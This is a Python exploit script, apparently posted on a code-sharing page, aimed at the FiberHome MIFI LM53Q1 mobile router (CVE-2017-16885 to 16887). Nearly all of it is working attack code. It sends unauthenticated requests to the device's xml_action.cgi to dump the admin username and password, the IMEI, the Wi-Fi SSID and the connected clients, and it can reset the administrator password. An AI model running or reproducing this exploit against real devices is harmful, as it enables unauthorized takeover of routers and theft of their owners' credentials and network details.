扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 |
#!/usr/bin/python # /$$$$$$$$ /$$ /$$ /$$ /$$ /$$$$$$$/$$ /$$$$$$$$ /$$ /$$ /$$ #| $$_____/|__/| $$| $$| $$| $$__$$| $$| $$_____/| $$|__/| $$ #| $$ /$$| $$$$$$$ /$$$$$$ /$$$$$$ | $$| $$/$$$$$$/$$$$$$/$$$$ /$$$$$$ | $$\ $$/$$$$$$/$$$$$$/$$$$ /$$$$$$/$$$$$$/$$$$$$ | $$ /$$ /$$/$$$$$$ | $$/$$$$$$/$$ /$$$$$$ #| $$$$$ | $$| $$__$$ /$$__$$ /$$__$$| $$$$$$$$ /$$__$$| $$_$$_$$ /$$__$$| $$$$$$$/ /$$__$$| $$_$$_$$ /$$__$$|_$$_/ /$$__$$| $$$$$ |$$ /$$/ /$$__$$| $$ /$$__$$| $$|_$$_/ #| $$__/ | $$| $$\ $$| $$$$$$$$| $$\__/| $$__$$| $$\ $$| $$ \ $$ \ $$| $$$$$$$$| $$__$$| $$$$$$$$| $$ \ $$ \ $$| $$\ $$| $$| $$$$$$$$| $$__/\$$$$/ | $$\ $$| $$| $$\ $$| $$| $$ #| $$| $$| $$| $$| $$_____/| $$| $$| $$| $$| $$| $$ | $$ | $$| $$_____/| $$\ $$| $$_____/| $$ | $$ | $$| $$| $$| $$ /$$| $$_____/| $$>$$$$ | $$| $$| $$| $$| $$| $$| $$ /$$ #| $$| $$| $$$$$$$/|$$$$$$$| $$| $$| $$|$$$$$$/| $$ | $$ | $$|$$$$$$$| $$| $$|$$$$$$$| $$ | $$ | $$|$$$$$$/|$$$$/|$$$$$$$| $$$$$$$$ /$$/\$$| $$$$$$$/| $$|$$$$$$/| $$|$$$$/ #|__/|__/|_______/\_______/|__/|__/|__/ \______/ |__/ |__/ |__/ \_______/|__/|__/ \_______/|__/ |__/ |__/ \______/\___/ \_______/|________/|__/\__/| $$____/ |__/ \______/ |__/ \___/ #| $$ #| $$ #|__/ # Exploit Title: FiberHome MIFI LM53Q1 Multiple Vulnerabilities # Exploit Author: Ibad Shah # Vendor Homepage: www.fiberhome.com # Version: VH519R05C01S38 # Tested on: Linux # Platform : Hardware # CVE : CVE-2017-16885, CVE-2017-16886, CVE-2017-16887 # Greetz : Taimoor Zafar, Jawad Ahmed, Owais Mehtab, Aitezaz Mohsin, ZHC import requests,sys,getopt,socket,struct #Declaring IP as our global variable to probe for Gateway IP of Device global ip #Getting Gateway IP Address def get_default_gateway_linux(): with open("/proc/net/route") as fh: for line in fh: fields = line.strip().split() if fields[1] != '00000000' or not int(fields[3], 16) & 2: continue return socket.inet_ntoa(struct.pack("<L", int(fields[2], 16))) return; ip = get_default_gateway_linux() exploit_title ="=============================================== \n FiberHome Remote Administrator Account Details \n================================================"; #Function to get Device Statistics def get_device_details(): gateway = None hardware = None device_name = None devices_all = '' version = None gateway = None ssid = '' dns1 = None dns2 = None requestStatus = requests.get("http://192.168.8.1/xml_action.cgi?method=get&module=duster&file=status1") api_response = requestStatus.content.replace('\t','').split('\n') for results in api_response: if "<hardware_version>" in results: hardware = results.replace('<hardware_version>','').replace('</hardware_version>','').replace(' ','').replace('\n','') if "<device_name>" in results: device_name = results.replace('<device_name>','').replace('</device_name>','').replace(' ','').replace('\n','') if "<version_num>" in results: version = results.replace('<version_num>','').replace('</version_num>','').replace(' ','').replace('\n','') if "<gateway>" in results: gateway = results.replace('<gateway>','').replace('</gateway>','').replace(' ','').replace('\n','') if "<ssid>" in results: ssid = results.replace('<ssid>','').replace('</ssid>','').replace('\n','') if "<dns1>" in results: dns1 = results.replace('<dns1>','').replace('</dns1>','').replace(' ','').replace('\n','') if "<dns2>" in results: dns2 = results.replace('<dns2>','').replace('</dns2>','').replace(' ','').replace('\n','') if "<IMEI>" in results: imei = results.replace('<IMEI>','').replace('</IMEI>','').replace(' ','').replace('\n','') print "\n==============================================" print "\nHardware Version of Device : "+hardware+"\n" print "\nName of Device : "+device_name+"\n" print "\nSoftware Version of Device : "+version+"\n" print "\nIMEI of Device! : "+imei+"\n" print "\nWiFi SSID of Device : "+ssid+"\n" print "\nGateway of Zong Device : "+gateway+"\n" print "\nDNS Primary of Device : "+dns1+"\n" print "\nDNS Secondary of Device : "+dns2+"\n" print "\n=============================================================================\n"; if "<known_devices_list>" in results: devices_all = results.replace('<known_devices_list>','').replace('</known_devices_list>','').replace('\n','') print "\nConnected Devices to WIFI\n" print devices_all #Function for getting User Account Details to login to Portal def get_user_account_details(): request = requests.get("http://"+ip+"/xml_action.cgi?method=get&module=duster&file=admin") admin_details = request.content.replace('\t','').split('\n') for admin_login_response in admin_details: if "<router_username>" in admin_login_response: username = admin_login_response.replace('<router_username>','').replace('</router_username>','') if "<router_password>" in admin_login_response: password = admin_login_response.replace('<router_password>','').replace('</router_password>','') print "\nUsername of Device Web Application :\n"+username+" " print "Password of Device Web Application :\n"+password+"\n" print "\n=============================================================================\n"; #Function to change Administrator Password def change_admin_password(): set_password = raw_input("\nEnter Password to Change : ") password = str(set_password) xml = "<?xml version='1.0' encoding='UTF-8'?><RGW><management><router_password>"+password+"</router_password></management></RGW>" headers = {'Content-Type': 'application/xml'} change_password_request = requests.post("http://"+ip+"/xml_action.cgi?method=set&module=duster&file=admin", data=xml, headers=headers).text print "Password Changed!" def main(): print exploit_title print "\nSelect Menu For Fetching Details \n \n 1. Get Portal Login & Password. \n 2. Get Other Details. \n 3. Change Admin Password for Device" get_option = raw_input("\n Enter Option :"); option = int(get_option) if get_option == "1": get_user_account_details() raw_input("\n Press Any Key To Exit"); elif get_option == "2": get_device_details() raw_input("\n Press Any Key To Exit"); elif get_option == "3": change_admin_password() elif get_option == "": print "Good Bye!"; else: print "Goodbye!"; main() |
体验盒子
